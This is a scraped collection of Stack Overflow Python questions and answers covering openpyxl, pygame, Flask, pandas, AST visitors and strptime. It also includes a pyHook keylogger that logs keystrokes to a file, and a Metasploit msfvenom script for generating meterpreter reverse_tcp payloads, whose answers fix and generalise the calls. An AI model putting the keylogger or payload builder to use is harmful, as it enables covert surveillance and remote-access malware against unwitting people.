<p>If you're using a formula then you should use an <code>expression</code> type rule. In general, it's always better to compose the rules and styles separately:</p> <pre><code>from openpyxl import Workbook from openpyxl.formatting.rule import Rule from openpyxl.styles.differential import DifferentialStyle from openpyxl.styles import Font, PatternFill red_text = Font(color="9C0006") red_fill = PatternFill(bgColor="FFC7CE") dxf = DifferentialStyle(font=red_text, fill=red_fill) r = Rule(type="expression", dxf=dxf) r.formula = ["NOT(ISBLANK(A1))"] wb = Workbook() ws = wb.active for v in range(10): ws.append([v]) ws['A4'] = None ws.conditional_formatting.add("A1:A10".format(ws.max_row), r) wb.save("sample.xlsx") </code></pre>
0
2016-08-03T12:13:33Z
[ "python", "openpyxl" ]
How to check for variable key presses in pygame
38,710,532
<p>I have been trying to create a game using pygame and I am struggling to get pygame to check for a keypress based on a variable.</p> <p>The code I have so far is:</p> <pre><code>import random, pygame, sys from pygame.locals import * points=0 pygame.init() screen = pygame.display.set_mode((600,350)) pygame.display.set_caption("LETTERPRESS") while True: FONT = pygame.font.SysFont("Comic Sans MS",30) Letter=random.randint(1,26) Letters={ 1 :"a", 2 :"b", 3 :"c", 4 :"d", 5 :"e", 6 :"f", 7 :"g", 8 :"h", 9 :"i", 10:"j", 11:"k", 12:"l", 13:"m", 14:"n", 15:"o", 16:"p", 17:"q", 18:"r", 19:"s", 20:"t", 21:"u", 22:"v", 23:"w", 24:"x", 25:"y", 26:"z"} label = FONT.render(Letters[Letter],1,(255,0,0)) screen.blit(label,(285,160)) pygame.display.update() while True: for event in pygame.event.get(): if event.type==QUIT: pygame.quit() sys.exit() if event.type == pygame.KEYDOWN: if event.key == pygame.K_[Letters[Letter]]: points +=1 break </code></pre> <p>The problematic part of the code is:</p> <pre><code>if event.key == pygame.K_[Letters[Letter]]: </code></pre> <p>Also, if you have any ways that I can clean up my program, please tell me. </p> <p>Thanks :)</p>
3
2016-08-02T01:37:39Z
38,738,576
<p>One fix would be to change the dictionary to</p> <pre><code> Letters={ 1 :pygame.K_a, 2 :pygame.K_b, 3 :pygame.K_c, </code></pre> <p>and so on, then <code>if event.key == Letters[Letter]:</code></p> <p>For general clean-up, you can take this to code-review; in particular, I see no reason to use a dictionary instead of a list for <code>Letters</code></p> <pre><code>Letters = [pygame.K_a, pygame.K_b ...] </code></pre> <p>Lists are 0-indexed so you would need to remember that 0 is 'a' and so on.</p> <p>You could improve <code>label = FONT.render(Letters[Letter],1,(255,0,0))</code> as <code>label = FONT.render(chr(Letter+65),1,(255,0,0))</code>, which removes the need for the values in Letters to be literal letters. </p> <p>Finally there is a syntax error with the line <code>if event.type == pygame.KEYDOWN:</code> as it is not followed by an indented block.</p>
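A small follow-on sketch of the list-based clean-up (my addition; treat the pygame detail as an assumption to verify against your install):

```python
# In the pygame versions I know of, the letter constants pygame.K_a..K_z
# equal ord('a')..ord('z'), so the whole table can be generated instead of
# written out by hand. This sketch uses ord() so it runs without pygame.
letters = [chr(c) for c in range(ord('a'), ord('z') + 1)]
keys = [ord(ch) for ch in letters]  # stands in for [pygame.K_a, ..., pygame.K_z]

# With 0-based indexing, index 0 is 'a' and index 25 is 'z'.
print(letters[0], keys[0])  # a 97
```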
3
2016-08-03T08:39:51Z
[ "python" ]
Injecting data into javascript with Python Flask
38,710,603
<p>I am following the instructions from <a href="http://www.highcharts.com/docs/getting-started/your-first-chart" rel="nofollow">http://www.highcharts.com/docs/getting-started/your-first-chart</a> to create a sample chart. I have saved the main chunk of javascript locally, and am adding the <code>&lt;script src="/chart.js"&gt;&lt;/script&gt;</code> tag in my HTML to reference it.</p> <p>On my side, I am using Python Flask to render an HTML template containing the script.</p> <pre><code>@app.route('/view', methods=['POST', 'GET']) def show_graph_view(): query= request.form['query'] data = get_current_data(query) return render_template('graph.html', data=data) </code></pre> <p>I have a function to prepare some custom and current data I want to plot instead and I want the data to be available once the client browser loads. How do I add this data into the charts? </p>
0
2016-08-02T01:46:37Z
38,710,782
<p>Assuming a globally accessible function, just call it in the module with the data converted to json on the server with the tojson and safe filters. </p> <pre><code>&lt;script type=text/javascript&gt; doSomethingWith({{ data|tojson|safe }}); &lt;/script&gt; </code></pre> <p>It's a bit hard to follow the logic when you mix together server side templating and client side scripting like this. But sometimes you gotta do it.</p>
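For the curious, a rough stdlib-only illustration of the idea behind the tojson filter (my sketch, not Flask's actual implementation): the data is serialized with json.dumps, and characters that could break out of the surrounding script tag are escaped.

```python
# Hypothetical helper mimicking the "HTML-safe JSON" idea: plain json.dumps
# output can contain "</script>", which would end the script block early.
import json

def htmlsafe_json(data):
    return (json.dumps(data)
            .replace('<', '\\u003c')
            .replace('>', '\\u003e')
            .replace('&', '\\u0026'))

payload = {"label": "</script><script>alert(1)</script>"}
print(htmlsafe_json(payload))
```

The escaped output is still valid JSON, so the browser-side parser recovers the original data unchanged.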
1
2016-08-02T02:13:52Z
[ "javascript", "python", "flask" ]
Pairwise Frequency Table for Multiple Columns in Python
38,710,682
<p>I have a table of patients diagnosis codes where each row represents all the diagnosis for one patient:</p> <pre><code> D0 D1 D2 D3 D4 D5 D6 0 0 0 0 0 0 0 0 1 I48.91 R60.9 M19.90 Z87.2 0 0 0 2 496 564.00 477.9 0 J44.9 J30.9 I10 3 I96 R63.0 Z51.5 0 L97.909 I69.90 F01.50 4 491.21 428.0 427.31 V58.61 0 I48.91 Z79.01 5 0 0 0 0 0 0 0 6 J44.9 F41.9 I10 H61.22 0 Z23 0 7 0 0 0 0 0 0 0 8 M48.00 I12.9 N18.9 K59.00 0 N39.0 Z23 9 I11.9 R41.82 R56.9 E11.49 K59.00 0 J45.901 10 I11.9 N40.0 F01.50 0 N40.1 J18.9 J44.1 11 R31.9 M19.90 0 R53.81 0 0 0 12 0 0 0 0 0 0 0 13 M48.02 M48.06 I27.2 0 R53.81 0 0 14 I50.9 M19.90 F41.9 I25.10 0 0 0 15 0 0 0 0 0 0 0 16 I69.359 I48.91 R74.8 I10 0 T50.901A I95.9 </code></pre> <p>... for 600+ patients, each of which have up to 15 diagnosis. (The 0's represent no diagnosis). I want to create a pairwise frequency table to count the number of times patients have different pairs of diagnosis:</p> <pre><code> I48.91 R60.9 M19.90 I48.91 count(I48.91) count(I48.91, R60.9) count(I48.91, M19.90) R60.9 count(R60.9, 148.91) M19.9 ... </code></pre> <p>I have created the table like this:</p> <pre><code>FreqTable = pd.DataFrame(columns=UniqueCodes['DCODE'], index=UniqueCodes['DCODE']) FreqTable = FreqTable.fillna(0) </code></pre> <p><a href="http://stackoverflow.com/questions/22175793/table-of-pairwise-frequency-counts-in-python">Table of Pairwise frequency counts in Python</a> does this for one column of data using nested for loops, but this gets complicated for multiple columns. Anyone have a good pythonese way to do this?</p>
4
2016-08-02T01:57:14Z
38,710,903
<p>Let's create a smaller example to make it easier to see the effect of each step and verify the correctness of the result:</p> <pre><code>df = pd.DataFrame({'D0': ['0', 'A', 'B', 'C'], 'D1': ['B', '0', 'C', 'D'], 'D2': ['C','D','0','A']}) # D0 D1 D2 # 0 0 B C # 1 A 0 D # 2 B C 0 # 3 C D A </code></pre> <p>Since 0's are to be ignored, let's change them to NaNs:</p> <pre><code>df = df.replace('0', np.nan) </code></pre> <p>The column labels <code>D0</code>, <code>D1</code>, <code>D2</code> are also ignorable. It's the row that matters. So let's <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.stack.html" rel="nofollow"><code>stack</code></a> the columns to make one Series:</p> <pre><code>code = df.stack() 0 D1 B D2 C 1 D0 A D2 D 2 D0 B D1 C 3 D0 C D1 D D2 A dtype: object </code></pre> <p>And since, again, the column labels don't matter, let's drop the second level of the index:</p> <pre><code>code.index = code.index.droplevel(1) code.name = 'code' </code></pre> <p>so that we end up with</p> <pre><code>0 B 0 C 1 A 1 D 2 B 2 C 3 C 3 D 3 A Name: code, dtype: object </code></pre> <p>Notice that the index of this Series refers to the original row label in <code>df</code>. 
If we were to <a href="http://pandas.pydata.org/pandas-docs/stable/merging.html#joining-on-index" rel="nofollow"><code>join</code></a> <code>code</code> <em>with itself</em>, then we would get a listing of all the pairs of codes from the same row, for each row:</p> <pre><code>code = code.to_frame() pair = code.join(code, rsuffix='_2') # code code_2 # 0 B B # 0 B C # 0 C B # 0 C C # 1 A A # 1 A D # 1 D A # 1 D D # 2 B B # 2 B C # 2 C B # 2 C C # 3 C C # 3 C D # 3 C A # 3 D C # 3 D D # 3 D A # 3 A C # 3 A D # 3 A A </code></pre> <p>Now the problem is solved by using <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.crosstab.html" rel="nofollow"><code>pd.crosstab</code></a> to make a frequency table based on this data:</p> <pre><code>freq = pd.crosstab(pair['code'], pair['code_2']) </code></pre> <hr> <p>Putting it all together:</p> <pre><code>import numpy as np import pandas as pd df = pd.DataFrame({'D0': ['0', 'A', 'B', 'C'], 'D1': ['B', '0', 'C', 'D'], 'D2': ['C','D','0','A']}) # D0 D1 D2 # 0 0 B C # 1 A 0 D # 2 B C 0 # 3 C D A df = df.replace('0', np.nan) code = df.stack() code.index = code.index.droplevel(1) code.name = 'code' code = code.to_frame() pair = code.join(code, rsuffix='_2') freq = pd.crosstab(pair['code'], pair['code_2']) </code></pre> <p>yields</p> <pre><code>code_2 A B C D code A 2 0 1 2 B 0 2 2 0 C 1 2 3 1 D 2 0 1 2 </code></pre>
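As an aside (my addition, not part of the answer above), the same pairwise counts can be produced without pandas, using only the standard library on the toy rows from the example:

```python
# Dependency-free pairwise frequency count over the same toy data:
# for each row, drop the '0' placeholders and count every ordered pair
# of remaining codes (including a code paired with itself).
from collections import Counter
from itertools import product

rows = [['0', 'B', 'C'],
        ['A', '0', 'D'],
        ['B', 'C', '0'],
        ['C', 'D', 'A']]

freq = Counter()
for row in rows:
    codes = [c for c in row if c != '0']
    for a, b in product(codes, codes):
        freq[(a, b)] += 1

print(freq[('C', 'C')], freq[('A', 'D')])  # 3 2
```

The counts agree with the crosstab above; the diagonal entries are the per-code row counts.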
3
2016-08-02T02:30:58Z
[ "python", "pandas" ]
Python script with open('filename') works with IDLE but doesn't work in console
38,710,683
<p>I'm trying to make this simple keylogger in python, it works just fine when i run in IDLE, but in console it doesn't write the log to the file.</p> <pre><code>import pyHook, pythoncom, sys log = '' def OnKeyPress(event): global log log += chr(event.Ascii) if event.Ascii == 27: # if user press esc with open('teste27.txt', 'a') as f: f.write(log) f.close() sys.exit(0) #instantiate HookManager class new_hook = pyHook.HookManager() #listen to all keystrokes new_hook.KeyDown = OnKeyPress #Hook the keyboard new_hook.HookKeyboard() #start the session pythoncom.PumpMessages() </code></pre>
0
2016-08-02T01:57:16Z
38,727,752
<p>To be helpful to others, the problem in the question needs explanation. An <code>open(filepath)</code> with a relative path, such as 'something.txt', will open the file relative to the 'current working directory'. For a simple filename, this means in that current working directory (CWD).</p> <p>When IDLE runs code in the editor, it sets the current working directory of the new process that runs the code to the directory of the code file. (The CWD of the IDLE process is ignored.) So if you were editing r'C:\Users\henrique\Documents\Programas\Python\Keylogger\teste27.py', then opening 'teste27.txt' will indeed open r'C:\Users\henrique\Documents\Programas\Python\Keylogger\teste27.txt'.</p> <p>A console is a running program with a CWD. For most consoles, the default prompt includes the CWD. When you run a program from the console, it inherits that CWD and runs with that CWD unless and until the program changes it. It must be that you did not make r'C:\Users\henrique\Documents\Programas\Python\Keylogger\' the console's CWD, but instead ran your program somewhere else by giving a path to the program: "python somepath/teste27.py". You should find a stray 'teste27.txt' in whatever CWD you started the program in.</p> <p>You can avoid having to add 'r' to paths by using forward slashes: 'C:/Users/henrique/Documents/Programas/Python/Keylogger/teste27.txt'. The only time you must use backslashes on Windows is in the console when you give a path for the program to be run.</p> <p>An alternate solution, useful when you open multiple files within a directory, is to make that directory the CWD. For instance,</p> <pre><code>import os os.chdir('C:/Users/henrique/Documents/Programas/Python/Keylogger') </code></pre> <p>Then <code>open('teste27.txt')</code> would have worked as you wanted.</p>
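To see the effect concretely, here is a small stdlib-only sketch (the directories and file name are made up for illustration) showing how the same relative name resolves to different absolute paths as the working directory changes:

```python
import os
import tempfile

# Two throwaway directories standing in for "the script's folder"
# and "wherever the console happened to be".
dir_a = tempfile.mkdtemp()
dir_b = tempfile.mkdtemp()

os.chdir(dir_a)
path_from_a = os.path.abspath('teste27.txt')  # resolves relative to dir_a

os.chdir(dir_b)
path_from_b = os.path.abspath('teste27.txt')  # same name, different file!

print(path_from_a)
print(path_from_b)
```

The two printed paths differ even though the `open()` call would name the same 'teste27.txt' in both cases — which is exactly why the log file ended up somewhere unexpected.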
0
2016-08-02T18:16:44Z
[ "python", "python-2.7", "file", "console", "python-idle" ]
Converting HTML to Excel with Django
38,710,688
<p>I have a reporting module in my Django app that gives the user the ability to see their reports on screen or to export them and have the export opened by Excel.</p> <p>The export is a cheat. I take the exact same output as the screen version and save it to a file with an .xls extension and response = HttpResponse(body, content_type='application/vnd.ms-excel') and badda-boom, badda-bing I have an Excel file that is lightly formatted, i.e. it respects the css styling that I've applied.</p> <p>The nice thing for the user is that the file auto-opens in Excel; there aren't any extra steps for them. (find the download, import a text file, etc.)</p> <p>Unfortunately it looks like Excel 2016 has decided (I'm guessing) that that's a security issue and no longer opens the file.</p> <p>I'm aware of various python -> Excel tools. openpyxl looks promising. But that's going to require me to touch each report.</p> <p>So, what I'm looking for is something that would give me what I have now, take an html file and have Excel open it as a native file and recognize the existing formatting. </p>
0
2016-08-02T01:58:45Z
38,809,400
<p>The behavior change has been noted by Microsoft and there are workarounds for the user:</p> <p><a href="https://support.microsoft.com/en-us/kb/3181507" rel="nofollow">https://support.microsoft.com/en-us/kb/3181507</a></p> <p>It sounds like they're working on a fix.</p>
0
2016-08-06T22:45:48Z
[ "python", "django", "excel" ]
SyntaxError: invalid syntax line 138 unexpected error
38,710,691
<p>I'm facing deep troubles with a script I was trying to write to answer a question on a course I was doing. I keep on getting SyntaxError: invalid syntax line 138 which was a bit odd. Here is my script. It would be wonderful if somebody could explain how to solve this. Thanks</p> <pre><code>class Message(object): def __init__(self, text): self.message_text = text self.valid_words = load_words(WORDLIST_FILENAME) def get_message_text(self): return self.message_text def get_valid_words(self): return self.valid_words[:] def build_shift_dict(self, shift): lc_str = string.ascii_lowercase uc_str = string.ascii_uppercase shifted_dict = {} 
 for ltr in lc_str: if lc_str.index(ltr) + shift &lt; 26: shifted_dict[ltr] = lc_str[lc_str.index(ltr) + shift] else: shifted_dict[ltr] = lc_str[lc_str.index(ltr)-26+shift] for ltr in uc_str: if uc_str.index(ltr) + shift &lt; 26: shifted_dict[ltr] = uc_str[uc_str.index(ltr) + shift] else: shifted_dict[ltr] = uc_str[uc_str.index(ltr)-26+shift] return shifted_dict def apply_shift(self, shift): cipher = self.build_shift_dict(shift) ciphertext = "" for char in self.message_text: if char in cipher: ciphertext = ciphertext + cipher[char] else: ciphertext = ciphertext + char return ciphertext </code></pre>
0
2016-08-02T01:59:21Z
38,710,732
<p>Between these two lines:</p> <pre><code>shifted_dict = {} for ltr in lc_str: </code></pre> <p>You have a non-ASCII character (<code>'\xe2'</code>). Delete it.</p> <p>(Python tells you exactly this if you try to load your code in a Python interpreter.)</p>
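If you want to locate such stray bytes yourself, a stdlib-only sketch like this scans text (e.g. the contents of a source file) and reports every non-ASCII character with its line and column — the sample `source` string below is a made-up stand-in for the file:

```python
def find_non_ascii(text):
    """Return (line_number, column, char) for every non-ASCII character."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line):
            if ord(ch) > 127:
                hits.append((lineno, col, ch))
    return hits

# A stand-in for the broken source file, with a stray '\xe2' on line 2:
source = "shifted_dict = {}\n\u00e2\nfor ltr in lc_str:\n"
print(find_non_ascii(source))  # -> [(2, 0, 'â')]
```

Running it on your real file (`find_non_ascii(open('script.py').read())` in Python 3) pinpoints the character to delete.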
1
2016-08-02T02:05:57Z
[ "python", "python-2.7", "syntax-error" ]
strptime with timestamp and AM/PM
38,710,721
<p>I am trying to convert from string to timestamp using:</p> <pre><code>from datetime import datetime date_object = datetime.strptime('09-MAR-15 12.54.45.000000000 AM', '%d-%b-%y %I.%M.%S.%f %p') </code></pre> <p>I get: <strong>ValueError</strong>: </p> <blockquote> <p>time data '09-MAR-15 12.54.45.000000000 AM' does not match format '%d-%b-%y %I.%M.%S.%f %p'</p> </blockquote>
0
2016-08-02T02:04:16Z
38,710,761
<p>The below will work as long as the part after the decimal point always ends in 000. :-) <code>%f</code> captures microseconds, while I guess your timestamp uses nanoseconds?</p> <pre><code>date_object = datetime.strptime('09-MAR-15 12.54.45.000000000 AM', '%d-%b-%y %I.%M.%S.%f000 %p') </code></pre> <p>You might consider just chopping off those three digits. E.g.</p> <pre><code>import re date_object = datetime.strptime( re.sub(r'\d{3}( .M)$', r'\1', '09-MAR-15 12.54.45.000000000 AM'), '%d-%b-%y %I.%M.%S.%f %p') </code></pre>
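Another option, avoiding the regex, is to normalise the fractional part to the six digits `%f` accepts before parsing — a stdlib-only sketch (the helper name is mine, not part of any library):

```python
from datetime import datetime

def parse_ts(ts):
    """Trim a nanosecond fraction down to the microseconds strptime accepts."""
    head, frac_ampm = ts.rsplit('.', 1)      # '...12.54.45', '000000000 AM'
    frac, ampm = frac_ampm.split(' ')
    return datetime.strptime('{}.{} {}'.format(head, frac[:6], ampm),
                             '%d-%b-%y %I.%M.%S.%f %p')

print(parse_ts('09-MAR-15 12.54.45.000000123 AM'))
```

This truncates (rather than rounds) anything below microsecond precision, which `datetime` cannot represent anyway.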
2
2016-08-02T02:11:23Z
[ "python", "python-2.7" ]
python compiler package explain
38,710,757
<p>I searched hard, but could hardly find any information on how to use the python compiler package (<a href="https://docs.python.org/2/library/compiler.html" rel="nofollow">https://docs.python.org/2/library/compiler.html</a>) and how to create a Visitor class that can be feed into the compiler.walk(<a href="https://docs.python.org/2/library/compiler.html#compiler.walk" rel="nofollow">https://docs.python.org/2/library/compiler.html#compiler.walk</a>) method.</p> <p>Can someone help me please? Thanks in advance.</p>
0
2016-08-02T02:11:01Z
38,723,700
<p>You create a visitor class by defining a subclass of <code>compiler.visitor.ASTVisitor</code> and then defining a method <code>visitXXX</code> for each type of node that you want your visitor to handle (where <code>XXX</code> is the name of the node type - the possible types of nodes are listed in the table in the documentation you linked).</p> <p>Any such method will take one argument (two if you count <code>self</code>), which will be the node object representing the visited node. The attributes available on such an object are also listed in the table. If you want the visitor to proceed further into the tree, you should call <code>visit</code> on each child node of the node.</p> <blockquote> <p>In the compiler.visitor.walk() method, it accepts 2 paramenters, tree and visitor. What are those?</p> </blockquote> <p><code>tree</code> is the AST that you want to process and <code>visitor</code> is an instance of the visitor class that you created to process that AST.</p> <blockquote> <p>And how can i obtain those?</p> </blockquote> <p>You obtain the AST by calling <code>compiler.parse</code> on some Python source code and you obtain the visitor by writing a visitor class and creating an instance of it.</p> <p>Here's an example using a visitor that simply counts the number of addition operators in a piece of Python code:</p> <pre><code>import compiler class PlusCounter(compiler.visitor.ASTVisitor): def __init__(self): self.count = 0 def visitAdd(self, node): self.count += 1 self.visit(node.left) self.visit(node.right) plus_counter = PlusCounter() compiler.walk(compiler.parse("1 + 2 * (3 + 4)"), plus_counter) print(plus_counter.count) </code></pre> <hr> <p>And here's the same example using the non-deprecated <code>ast</code> package, which works basically the same way, but has a slightly different AST structure. 
Unlike the above code, this one will actually work in Python 3:</p> <pre><code>import ast class PlusCounter(ast.NodeVisitor): def __init__(self): self.pluses = 0 def visit_Add(self, node): # We don't need to visit any child nodes here because in the ast package # the AST is structured slightly differently and Add is merely a child # node of the BinOp node, which holds the operands. So Add itself has # no children that need to be visited self.pluses += 1 plus_counter = PlusCounter() plus_counter.visit(ast.parse("1 + 2 * (3 + 4)")) print(plus_counter.pluses) </code></pre>
2
2016-08-02T14:47:32Z
[ "python", "compiler-construction", "abstract-syntax-tree" ]
python compiler package explain
38,710,757
<p>I searched hard, but could hardly find any information on how to use the python compiler package (<a href="https://docs.python.org/2/library/compiler.html" rel="nofollow">https://docs.python.org/2/library/compiler.html</a>) and how to create a Visitor class that can be feed into the compiler.walk(<a href="https://docs.python.org/2/library/compiler.html#compiler.walk" rel="nofollow">https://docs.python.org/2/library/compiler.html#compiler.walk</a>) method.</p> <p>Can someone help me please? Thanks in advance.</p>
0
2016-08-02T02:11:01Z
38,725,221
<p>Since the <code>compiler</code> package is deprecated, you should probably also take a look at the <a href="https://docs.python.org/2/library/ast.html" rel="nofollow"><code>ast</code> package</a>.</p> <p>Good docs on the Python <code>ast</code> can be found in "<a href="https://greentreesnakes.readthedocs.io/en/latest/" rel="nofollow">Green Tree Snakes - The Missing Python AST docs</a>". A very extensive example of it's use is <a href="https://github.com/JdeH/Transcrypt/tree/1dd2380441fa371e33e3f272f3911fb2743baa98/transcrypt/modules/org/transcrypt/compiler.py#L434" rel="nofollow">Transcrypt's <code>Generator</code> class</a>.</p>
2
2016-08-02T15:53:34Z
[ "python", "compiler-construction", "abstract-syntax-tree" ]
python class's attribute not in __init__
38,710,765
<p>I want to know why the following codes work?<br></p> <pre><code>#!/usr/bin/env python3 import sys class Car(): def __init__(self): pass if __name__ == '__main__': c = Car() c.speed = 3 c.time = 5 print(c.speed, c.time) </code></pre> <p>I accidentally found that I don't have to init attributes in <strong>init</strong>. I learn from every tutor I have to put assignment in <strong>init</strong> like below.</p> <pre><code>#!/usr/bin/env python3 import sys class Car(): def __init__(self): self.speed = 3 self.time = 5 if __name__ == '__main__': c = Car() print(c.speed, c.time) </code></pre> <p>If there are some official documents can explain this would be better. </p>
1
2016-08-02T02:11:40Z
38,713,308
<p>It's class attributes vs instance attributes vs dynamic attributes. When you do:</p> <pre><code>class Car(): def __init__(self): pass c = Car() c.speed = 3 c.time = 5 </code></pre> <p><code>speed</code> and <code>time</code> are dynamic attributes <em>(not sure if this is an official term)</em>. If the <em>usage</em> of the class is such that these attributes are set before calling any other methods of <code>Car</code>, then those methods can use <code>self.speed</code>. Otherwise, you get an error:</p> <pre><code>&gt;&gt;&gt; d = Car() &gt;&gt;&gt; d.speed Traceback (most recent call last): File "&lt;stdin&gt;", line 1, in &lt;module&gt; AttributeError: 'Car' object has no attribute 'speed' &gt;&gt;&gt; </code></pre> <p>This happens because for <code>c</code>, speed and time are attributes on that instance of <code>Car</code>. Their existence or value doesn't propagate across other instances of Car. So when I create <code>d</code> and then try to lookup <code>d.speed</code>, the attribute doesn't exist. As you've said in your own comment, <em>"they spring into existence when they are first assigned to."</em></p> <blockquote> <p>I accidentally found that I don't have to init attributes in init. I learn from every tutor I have to put assignment in init like below.</p> </blockquote> <p>Your tutors were very wrong or you misunderstood what they meant. In the example you gave, every Car gets the same initial <code>speed</code> and <code>time</code>. Typically, an <code>__init__</code> would look like this:</p> <pre><code>class Car(): def __init__(self, speed, time): # notice that speed and time are # passed as arguments to init self.speed = speed self.time = time </code></pre> <p>You can then initialise a <code>Car</code> with: <code>c = Car(3, 5)</code>. 
Or put default values in init if it's optional.</p> <p>Edit: example adapted <a href="https://docs.python.org/3/tutorial/classes.html#class-and-instance-variables" rel="nofollow">from the docs</a>:</p> <pre><code>class Dog: kind = 'canine' # class variable shared by all instances def __init__(self, name): self.name = name # instance variable unique to each instance &gt;&gt;&gt; d = Dog('Fido') &gt;&gt;&gt; e = Dog('Buddy') &gt;&gt;&gt; d.kind # shared by all dogs 'canine' &gt;&gt;&gt; e.kind # shared by all dogs 'canine' &gt;&gt;&gt; d.name # unique to d 'Fido' &gt;&gt;&gt; e.name # unique to e 'Buddy' &gt;&gt;&gt; d.age = 3 # dynamic attribute/variable, unique to d &gt;&gt;&gt; d.age 3 &gt;&gt;&gt; e.age # e doesn't have it at all Traceback (most recent call last): File "&lt;stdin&gt;", line 1, in &lt;module&gt; AttributeError: 'Dog' object has no attribute 'age' </code></pre>
2
2016-08-02T06:38:04Z
[ "python", "class", "variable-assignment" ]
Appending variables as strings when passing command line arguments in python 2.7.12
38,710,788
<p>I am attempting to create a Metasploit payload generator with Python 2.7.12. It generates many malicious payloads utilizing <code>msfvenom</code>. </p> <p>First I utilize the <code>%s</code> and <code>%d</code> format operators.</p> <pre><code>call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST=%s", "LPORT=%s", "-e %s", "-i %d", "-f %s", "&gt; %s.%s"]) % (str(lhost), str(lport), str(encode), iteration, str(formatop), str(payname), str(formatop)) </code></pre> <p>This error returns</p> <pre><code>/usr/bin/msfvenom:168:in `parse_args': invalid argument: -i %d (OptionParser::InvalidArgument) from /usr/bin/msfvenom:283:in `&lt;main&gt;' Traceback (most recent call last): File "menu.py", line 74, in &lt;module&gt; call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST=%s", "LPORT=%s", "-e %s", "-i %d", "-f %s", "&gt; %s.%s"]) % (str(lhost), str(lport), str(encode), iteration, str(formatop), str(payname), str(formatop)) TypeError: unsupported operand type(s) for %: 'int' and 'str' </code></pre> <p>I am able to understand that msfvenom is not able to parse the argument I pass, which was the iteration flag, <code>-i</code>. Following that I see an error from Python, <code>TypeError</code>.</p> <p>After conducting some research, I decided to use <code>.format()</code>, since </p> <pre><code>call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST={0}", "LPORT={1}", "-e {2}", "-i {3}", "-f {4}", "&gt; {5}.{6}"]).format(lhost, lport, encode, iteration, formatop, payname, formatop) </code></pre> <p>It returns</p> <pre><code>AttributeError: 'int' object has no attribute 'format' </code></pre> <p>What should I do? Also are there anyways I can optimize my program and instead of copy and pasting the same line, and changing the payload type for 15 options? </p>
1
2016-08-02T02:14:23Z
38,710,918
<p>A good trick is to use <code>split</code> on your command to create the list that's passed to <code>call</code>. Format the string first, then split it, so the variable substitution stays clean:</p> <pre><code>call("msfvenom -p windows/meterpreter/reverse_tcp LHOST={0} LPORT={1} -e {2} -i {3} -f {4}" .format(lhost, lport, encode, iteration, formatop) .split()) </code></pre> <p>Note this only works when none of the substituted values contain spaces, and the <code>&gt; {}.{}</code> redirection has to be dropped: <code>subprocess.call</code> does not go through a shell, so redirect to a file with the <code>stdout</code> argument instead (or pass <code>shell=True</code>, which is unsafe).</p>
-1
2016-08-02T02:32:57Z
[ "python" ]
Appending variables as strings when passing command line arguments in python 2.7.12
38,710,788
<p>I am attempting to create a Metasploit payload generator with Python 2.7.12. It generates many malicious payloads utilizing <code>msfvenom</code>. </p> <p>First I utilize the <code>%s</code> and <code>%d</code> format operators.</p> <pre><code>call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST=%s", "LPORT=%s", "-e %s", "-i %d", "-f %s", "&gt; %s.%s"]) % (str(lhost), str(lport), str(encode), iteration, str(formatop), str(payname), str(formatop)) </code></pre> <p>This error returns</p> <pre><code>/usr/bin/msfvenom:168:in `parse_args': invalid argument: -i %d (OptionParser::InvalidArgument) from /usr/bin/msfvenom:283:in `&lt;main&gt;' Traceback (most recent call last): File "menu.py", line 74, in &lt;module&gt; call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST=%s", "LPORT=%s", "-e %s", "-i %d", "-f %s", "&gt; %s.%s"]) % (str(lhost), str(lport), str(encode), iteration, str(formatop), str(payname), str(formatop)) TypeError: unsupported operand type(s) for %: 'int' and 'str' </code></pre> <p>I am able to understand that msfvenom is not able to parse the argument I pass, which was the iteration flag, <code>-i</code>. Following that I see an error from Python, <code>TypeError</code>.</p> <p>After conducting some research, I decided to use <code>.format()</code>, since </p> <pre><code>call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST={0}", "LPORT={1}", "-e {2}", "-i {3}", "-f {4}", "&gt; {5}.{6}"]).format(lhost, lport, encode, iteration, formatop, payname, formatop) </code></pre> <p>It returns</p> <pre><code>AttributeError: 'int' object has no attribute 'format' </code></pre> <p>What should I do? Also are there anyways I can optimize my program and instead of copy and pasting the same line, and changing the payload type for 15 options? </p>
1
2016-08-02T02:14:23Z
38,711,005
<p>You cannot use <code>format</code> on the result of the <code>call(...)</code>. You should format each component:</p> <pre><code>with open("{}.{}".format(payname, formatop), 'w') as outfile: call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST={}".format(lhost), "LPORT={}".format(lport), "-e", str(encode), "-i", str(iteration), "-f", str(formatop)], stdout=outfile) </code></pre> <p>Note that the redirection is replaced with an explicitly opened file, because <code>subprocess.call</code> will not pass that to the shell unless you enable the unsafe <code>shell=True</code> argument.</p> <p>To repeat this multiple times with a different payload is easy: create an array with the payloads then put this code into a loop (or, perhaps clearer, a function called with one payload at a time).</p>
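The looping idea can be sketched like this — the payload names, host, and encoder below are placeholders for illustration (check `msfvenom -l payloads` for real names), and the actual `call` is left commented out:

```python
def build_cmd(payload, lhost, lport, encode, iteration, fmt):
    """Build the msfvenom argument list for one payload (no shell needed)."""
    return ["msfvenom", "-p", payload,
            "LHOST={}".format(lhost), "LPORT={}".format(lport),
            "-e", str(encode), "-i", str(iteration), "-f", str(fmt)]

# Hypothetical payload list -- substitute the 15 options you need.
payloads = ["windows/meterpreter/reverse_tcp",
            "linux/x86/meterpreter/reverse_tcp"]

for p in payloads:
    cmd = build_cmd(p, "10.0.0.5", 4444, "x86/shikata_ga_nai", 3, "exe")
    print(cmd)
    # with open('{}.exe'.format(p.replace('/', '_')), 'w') as out:
    #     call(cmd, stdout=out)
```

One function plus a list replaces fifteen copy-pasted blocks, and each argument is its own list element so no quoting or shell escaping is needed.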
0
2016-08-02T02:43:26Z
[ "python" ]
Python 3 -- using kwargs with an args only module
38,710,801
